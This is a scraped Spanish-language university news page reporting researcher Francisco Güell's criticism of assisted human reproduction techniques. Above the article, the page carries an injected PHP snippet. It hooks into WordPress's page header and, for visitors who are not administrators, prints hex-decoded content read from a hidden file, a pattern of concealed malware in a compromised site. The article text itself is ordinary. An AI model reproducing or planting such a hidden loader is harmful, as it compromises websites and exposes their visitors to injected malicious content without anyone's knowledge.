if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La ciencia busca imitar el desarrollo natural del ser humano – La Opinión Universitaria La Opinión Universitaria
Menu

La ciencia busca imitar el desarrollo natural del ser humano

 

Enfatizó que los médicos e investigadores no deben imitar lo que ocurre de manera natural con el ser humano a la hora de concebir, porque lo que ellos buscan es atentar con el cauce natural de la naturaleza humana, advirtió Francisco Güell, investigador y coordinador del “Grupo Mente-cerebro” del Instituto Cultural y Social (ICS), de la Universidad de Navarra España y profesor visitante de la UPAEP

“En el imaginario de la sociedad, está la idea de que las técnicas, de que lo artificial va a ser mejor, con más cuidado, más estudiado y eso es absolutamente falso. Es decir, lo artificial, las técnicas, tratan de imitar lo que ocurre de manera natural. …la ciencia suda por tratar de conocer cómo pasan las cosas de manera natural., para tratar de copiarlas y no para hacer cosas que tengan otro camino”. Las consecuencias ya las conocemos, ahí están los estudios y los resultados que se están derivando con el uso de las de reproducción humana asistida, manifestó el investigador.

En conferencia de prensa, el Dr. Güell, comentó “cuando asiste un matrimonio a las técnicas de reproducción, se le está diciendo estamos haciendo todo lo que está en nuestras manos por no dañar y no ampliar los riesgos para la salud de su hijo; o se está pensando más bien, no se preocupe, cuanto antes Usted se va a quedar embarazada”.

El chip que queremos proponer, es cambiar la mentalidad y transmitir a los responsables y en todos los niveles que utilizan técnicas de reproducción humana asistida y a los de la parte jurídica, se está poniendo prioridad a la salud del niño que acaba siendo la salud de la sociedad, refirió el Dr. Güell.

Abundó que la gente que está implicada en este campo, pueda irse a la cama con la conciencia tranquila de haber hecho lo mejor que está en sus manos.

Indicó que en el campo de la reproducción humana asistida, se ha registrado poca reflexión y muy poco diálogo entre las distintas posturas, en donde se puede decir que se ha enfocado del mismo modo o alguien está totalmente de acuerdo con las técnicas y se puede hacer lo que sea, o bien, alguien no está totalmente de acuerdo con las técnicas y habrá que prohibirlo todo, comentó el Dr. Güell Peralta.

No comments

Deja una respuesta

Tweets recientes